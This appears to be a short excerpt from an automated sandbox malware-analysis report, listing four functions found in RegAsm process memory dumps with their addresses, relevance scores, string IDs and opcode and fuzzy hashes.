                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-2667574237
                                                                                                                                    • Opcode ID: 20236a8dec9f483185f7c567b6994d78c239ca7eb6a9669cd3322f1f6ac9e752
                                                                                                                                    • Instruction ID: 72d84f03e55e10277dfefab1de333bfc5d39d608ca2e6a831fc9ffc4ce8bf1ef
                                                                                                                                    • Opcode Fuzzy Hash: 20236a8dec9f483185f7c567b6994d78c239ca7eb6a9669cd3322f1f6ac9e752
                                                                                                                                    • Instruction Fuzzy Hash: 4C223A74A002199FEB15EFB8D950A9DBBF6FB84300F1085AAD2056B368DF31AD49CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685ED10 Relevance: 7.9, Strings: 6, Instructions: 379COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$(_^q$(_^q$(_^q$(_^q
                                                                                                                                    • API String ID: 0-2896069617
                                                                                                                                    • Opcode ID: caa903a5d215346cc813d3261e11abbbde2331eb9997b28e8ed856335aa74ae7
                                                                                                                                    • Instruction ID: 10cf3bcf2d8e48130dc7e0a3866de69b73373cd6bb18c85f9e2eb31fa21bc571
                                                                                                                                    • Opcode Fuzzy Hash: caa903a5d215346cc813d3261e11abbbde2331eb9997b28e8ed856335aa74ae7
                                                                                                                                    • Instruction Fuzzy Hash: 2FD1DC35B043049FDB44AF78C8146AE7BB6FFC5310B2885AAD906DB391DA31DE06CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC85D9 Relevance: 6.5, Strings: 5, Instructions: 278COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-142850551
                                                                                                                                    • Opcode ID: 6b1dca0c17fdc13032a134cb06f4a3050c6db8bc677439cd6c152478c5747d2f
                                                                                                                                    • Instruction ID: a718032dfda04e2a5faa8e1d2e203c1c43844e93109466e0d1574dbf09dbafe2
                                                                                                                                    • Opcode Fuzzy Hash: 6b1dca0c17fdc13032a134cb06f4a3050c6db8bc677439cd6c152478c5747d2f
                                                                                                                                    • Instruction Fuzzy Hash: 7DC13F789402099FDB05EFB8D850A9DBBB6FF88304F10892AD115AF368DB32AD45CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC85E8 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (_^q$(_^q$$^q$$^q$$^q
                                                                                                                                    • API String ID: 0-142850551
                                                                                                                                    • Opcode ID: 00750b11f55386caa3ac4dafb49dbea9f8fb204073ec7b3d64d5d823b78cbc54
                                                                                                                                    • Instruction ID: 192dee33393db1cda43933e7845873c14d66086ee59f61190b3835174b9a2cc3
                                                                                                                                    • Opcode Fuzzy Hash: 00750b11f55386caa3ac4dafb49dbea9f8fb204073ec7b3d64d5d823b78cbc54
                                                                                                                                    • Instruction Fuzzy Hash: F6C12F789402099FDB05EFB8D850A9DBBB6FF88304F10892AD115AF368DB32AD45CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%